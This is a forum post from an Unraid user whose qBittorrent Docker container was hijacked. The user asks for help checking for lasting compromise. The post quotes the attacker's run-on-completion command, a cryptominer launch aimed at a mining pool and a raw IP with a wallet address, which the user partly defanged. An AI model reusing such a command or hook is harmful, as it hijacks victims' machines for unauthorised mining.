Skip to content
View in the app

A better way to browse. Learn more.

Unraid

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Docker container compromised - Unraid affected?

Featured Replies

tower-diagnostics-20210830-1839.zipI was away from home last night, and when I came back from work today, I noticed that my CPU was nearly maxed out. This was odd, but does happen sometimes. However, I went into my torrent client (qbittorrent), and found that all of my torrents had been deleted and had been replaced with a single torrent for some kind of Italian music. qbt1.png

 

It should go without saying that I have never heard of this music nor did I seek it out. I went into my logs for qbt, and found the following:

qbt1.pngqbt2.png

 

I have no idea what those ports I circled are; I have never used them to my knowledge. I also found in my settings that some code was marked to be executed upon completion of the torrent:

/tmp/x -o pool.suppo[CODE NEUTER]rtxmr.com:443 -u 8C2GLAN7wPEDE7xAiCLYBwdPtjc3B5pWH[CODE NEUTER]44989qMTmwSjbKmm2Y1Zog9UJWchsnrkjF4qkr7CbCtUAS4QGWyxhRW7Vfg5RZ -k --tls -o 107.173.34.104:9090

The [CODE NEUTER]s were added by me to prevent any accidental activation

 

Furthermore, the logs Unraid gives me for qbt show this:

qbt3.png

 

All in all, I take this to mean that someone hijacked my system to run some kind of mining software. I can see in the logs here that the line of code to be run on completion was changed a few times, I assume this was the hacker setting up their system.

 

I've already done what I can to stop any further access and stop any illicit activity, but I'm worried about making sure there isn't any lasting damage or compromise. I am not very well versed with this stuff, so I would appreciate any suggestions.

 

I have attached my diag file

https://forums.unraid.net/applications/core/interface/file/attachment.php?id=125259&key=7d5b734ea2581f6305efd6e1c07edb66

Edited by brainyyak

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

Account

Navigation

Search

Search

Configure browser push notifications

Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.